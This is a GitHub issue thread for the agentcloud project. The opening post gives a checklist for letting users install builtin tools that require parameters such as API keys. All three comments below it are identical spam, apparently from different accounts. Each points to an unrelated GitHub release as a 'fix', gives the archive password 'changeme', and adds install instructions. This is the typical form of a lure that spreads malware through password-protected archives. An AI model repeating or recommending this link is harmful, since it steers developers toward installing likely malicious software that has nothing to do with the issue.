### ISSUE TITLE
"install" builtin tool + support required parameters (for some builtin tools e.g. serper)

### ISSUE THREAD

**Issue by tomlynchRNA** [rnadigital/agentcloud#499]
- [x] Hide builtin tools that require arguments from the tool dropdowns in tasks, agents, anything else
- [x] Change builtin tools on the tools screen that require arguments to have an "install" button
- [x] Installing the tool clones it but puts it into your current team
- [x] the cloned tool should have a new property that links it to the original tool (e.g. `linkedToolId: ObjectId;`) so we can update them if necessary or do revisioning in future
- [x] update agent-backend to use the "builtin tools" flow for both `data.builtin` tools, and the new "installed" tools that have a `linkedToolId` property
- [x] show badge on liked tools 

Implement the ability to install builtin tools and add api keys as such. I whipped this design up quickly, if you think I've overlooked something, please let me know and we can amend it.

This can be fit into the current design/code, and doesn't depend on figma/visual design change. Visual update can be a separate ticket.

cc @iandjx @anada10 if you want Ian or myself to take this on.

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dionathanfreitas** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
